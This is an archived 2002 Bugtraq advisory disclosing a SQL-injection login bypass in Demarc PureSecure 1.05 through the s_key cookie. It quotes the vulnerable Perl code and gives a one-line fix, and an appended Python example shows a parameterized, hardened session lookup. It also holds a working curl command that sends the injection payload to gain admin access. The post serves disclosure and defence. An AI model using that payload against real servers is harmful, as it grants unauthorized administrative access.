[25072] in bugtraq


Demarc PureSecure 1.05 may be other (user can bypass login)

daemon@ATHENA.MIT.EDU (pokleyzz sakamaniaka)
Tue Apr 16 15:41:23 2002

Date: 15 Apr 2002 07:32:18 -0000
Message-ID: <20020415073218.3088.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: pokleyzz sakamaniaka <pokleyzz@hotmail.com>
To: bugtraq@securityfocus.com



Demarc PureSecure (http://www.demarc.org) is an 
all-inclusive network monitoring solution that allows 
you to monitor an entire network of servers from one 
powerful web interface.

A user can bypass login and gain admin status by SQL 
injection through the s_key cookie.

--------- line 319 ------------------------------
elsif (($cookies{'s_key'}) && ($cookies{'s_key'}->value)){
	$logged_in_as = &check_login($cookies{'s_key'}->value);
	if (!$logged_in_as){
		&print_login_screen;
		&safe_exit;
	}
-----------------------------------------------------

The s_key value is then used in the SQL query built in 
function check_login (line 6114).

--------- line 6114 -----------------------------
$sql_query = "	SELECT \
			f1,f2,f3,admin,username,UNIX_TIMESTAMP(current_login_timedate) AS LOGINTIME \
		FROM \
			dm_sessions \
		WHERE current_session_id = '$session_id' ";
-----------------------------------------------------

-=solution=-
line 6113: &safe_slash(\$session_id);

using curl (http://curl.haxx.se/download/):
curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc


http://www.inetd-secure.net
http://www.mybsd.org
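
A hardened form of the session lookup described above, as an added example that is not part of the original post or of Demarc's code. It is written in Python with an in-memory SQLite table standing in for dm_sessions; the 32-hex-character session id format, the sample row and the helper names other than check_login are assumptions. It binds the cookie value as a query parameter instead of interpolating it, which is a stronger fix than escaping.

```python
import re
import sqlite3
from urllib.parse import unquote

# Assumption: session ids are 32 lowercase hex chars (the post does not give the format).
SESSION_ID_RE = re.compile(r"[0-9a-f]{32}")
# Constructed sample session, not taken from the post.
SAMPLE_SESSION = "0123456789abcdef0123456789abcdef"
# The s_key value from the curl line in the post, URL-decoded.
REPORTED_COOKIE = unquote("'%20OR%20current_session_id%20like%20'%'%23")

QUERY = "SELECT username, admin FROM dm_sessions WHERE current_session_id = ?"


def make_demo_db():
    """Constructed stand-in for dm_sessions (subset of the columns in the post)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE dm_sessions (current_session_id TEXT PRIMARY KEY, "
        "username TEXT, admin INTEGER, current_login_timedate INTEGER)"
    )
    db.execute(
        "INSERT INTO dm_sessions VALUES (?, ?, ?, ?)",
        (SAMPLE_SESSION, "admin", 1, 1018855938),
    )
    return db


def lookup_bound(db, session_id):
    """Binding alone: the value is passed as data, so quotes and % match nothing."""
    return db.execute(QUERY, (session_id,)).fetchone()


def check_login(db, session_id):
    """Return (username, admin) for a known session id, else None."""
    # Defence in depth: reject values that are not shaped like a session id
    # before they reach the database at all.
    if not isinstance(session_id, str) or not SESSION_ID_RE.fullmatch(session_id):
        return None
    return lookup_bound(db, session_id)


if __name__ == "__main__":
    db = make_demo_db()
    print("valid session  :", check_login(db, SAMPLE_SESSION))
    print("reported cookie:", check_login(db, REPORTED_COOKIE))
```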




